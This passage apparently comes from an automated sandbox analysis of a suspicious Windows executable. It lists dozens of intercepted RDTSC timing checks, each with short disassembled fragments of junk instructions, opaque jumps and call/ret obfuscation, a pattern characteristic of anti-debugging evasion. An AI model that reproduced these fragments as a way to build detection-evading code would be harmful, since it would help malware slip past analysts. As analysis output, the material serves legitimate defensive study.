                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E974E second address: 6E9752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9752 second address: 6E9798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+122D2DDCh], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FD0F8CDABE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 and ecx, dword ptr [ebp+122D2B6Bh] 0x0000002f push 91B8962Bh 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007FD0F8CDABEBh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9798 second address: 6E979D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E979D second address: 6E9808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6E476A55h 0x00000010 mov dword ptr [ebp+122D2DCCh], edx 0x00000016 push 00000003h 0x00000018 mov edi, 009CFDF6h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FD0F8CDABF9h 0x00000025 pop edx 0x00000026 pop ecx 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D2C47h] 0x0000002f push A3ED00D1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD0F8CDABF3h 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9808 second address: 6E980E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAE79 second address: 6FAE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707086 second address: 70708B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70708B second address: 707091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707091 second address: 70709A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70709A second address: 7070A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7070A4 second address: 7070A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707350 second address: 70735D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FD0F8CDABE8h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70735D second address: 707369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD0F8E1A7A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707369 second address: 707386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707386 second address: 707390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707390 second address: 70739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70739A second address: 7073B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7073B4 second address: 7073E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD0F8CDABEAh 0x00000012 pop eax 0x00000013 ja 00007FD0F8CDABF9h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7073E5 second address: 70740C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B8h 0x00000009 jmp 00007FD0F8E1A7ABh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707ED6 second address: 707EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FD0F8CDABE6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EE9 second address: 707EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707EED second address: 707F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 ja 00007FD0F8CDAC15h 0x0000000d jnc 00007FD0F8CDAC01h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700043 second address: 700059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700059 second address: 700074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FD0F8CDABE6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007FD0F8CDABF0h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD9C0 second address: 6CD9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708729 second address: 70873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FD0F8CDABE6h 0x0000000c jno 00007FD0F8CDABE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70873D second address: 70874A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70874A second address: 708750 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708750 second address: 708760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD0F8E1A7AEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708760 second address: 70876E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FD0F8CDABE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70876E second address: 708772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A49 second address: 708A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A4F second address: 708A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708CFB second address: 708CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708CFF second address: 708D15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FD0F8E1A7A6h 0x0000000d jnc 00007FD0F8E1A7A6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CBF9 second address: 70CBFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CBFF second address: 70CC25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7ACh 0x00000008 jl 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD0F8E1A7B1h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CC25 second address: 70CC2F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCC8 second address: 70DCDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 je 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCDB second address: 70DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCE1 second address: 70DCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCFA second address: 70DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD0F8CDABEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714917 second address: 714921 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0F8E1A7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714921 second address: 714927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D25 second address: 713D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713EAF second address: 713EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007FD0F8CDABE6h 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7145CB second address: 7145E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0F8E1A7ADh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7145E0 second address: 7145EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71476F second address: 714775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714775 second address: 71477F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71477F second address: 714794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0F8E1A7AFh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714794 second address: 7147A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D92 second address: 715DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EA4 second address: 715EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EA8 second address: 715EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EAE second address: 715EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716087 second address: 716090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D1C second address: 716D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D26 second address: 716D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717E7B second address: 717ED0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FD0F8CDABEAh 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD0F8CDABE8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D29DFh] 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b mov dword ptr [ebp+122D1835h], edi 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 mov esi, 252D9022h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717ED0 second address: 717ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717ED6 second address: 717EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718DD6 second address: 718DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71984B second address: 7198C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 pushad 0x00000009 movzx edx, dx 0x0000000c jl 00007FD0F8CDABFBh 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FD0F8CDABE8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jg 00007FD0F8CDABEEh 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D2DD7h], ebx 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FD0F8CDABEDh 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7198C1 second address: 7198CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A397 second address: 71A39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A39C second address: 71A3F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8E1A7ACh 0x00000008 js 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add esi, dword ptr [ebp+12484AF8h] 0x00000017 jmp 00007FD0F8E1A7B7h 0x0000001c push 00000000h 0x0000001e call 00007FD0F8E1A7B8h 0x00000023 mov esi, dword ptr [ebp+122D2BDBh] 0x00000029 pop esi 0x0000002a push 00000000h 0x0000002c movzx esi, si 0x0000002f xchg eax, ebx 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A3F6 second address: 71A3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE4F second address: 71AE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AC19 second address: 71AC28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE54 second address: 71AE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE63 second address: 71AEBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FD0F8CDABEFh 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD0F8CDABF9h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AEBC second address: 71AF36 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnp 00007FD0F8E1A7ACh 0x0000000e mov dword ptr [ebp+122D1835h], edi 0x00000014 mov edi, dword ptr [ebp+122D1BE4h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD0F8E1A7A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jng 00007FD0F8E1A7ACh 0x0000003c sbb esi, 705AF71Fh 0x00000042 push 00000000h 0x00000044 call 00007FD0F8E1A7B7h 0x00000049 mov esi, dword ptr [ebp+122D2B63h] 0x0000004f pop edi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jc 00007FD0F8E1A7ACh 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2C1 second address: 71C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2C7 second address: 71C2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2CD second address: 71C2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2D1 second address: 71C2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD35 second address: 71DD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD3F second address: 71DD43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F302 second address: 71F323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD0F8CDABFAh 0x0000000d jmp 00007FD0F8CDABEEh 0x00000012 jnp 00007FD0F8CDABE6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F323 second address: 71F349 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8E1A7ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD0F8E1A7B4h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721F73 second address: 721F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225E7 second address: 7225EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225EB second address: 7225EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72270A second address: 72270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248BA second address: 7248C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72270F second address: 722715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7258F1 second address: 7258F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248C0 second address: 7248C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7258F7 second address: 725904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FD0F8CDABE6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725B01 second address: 725B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725B07 second address: 725B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
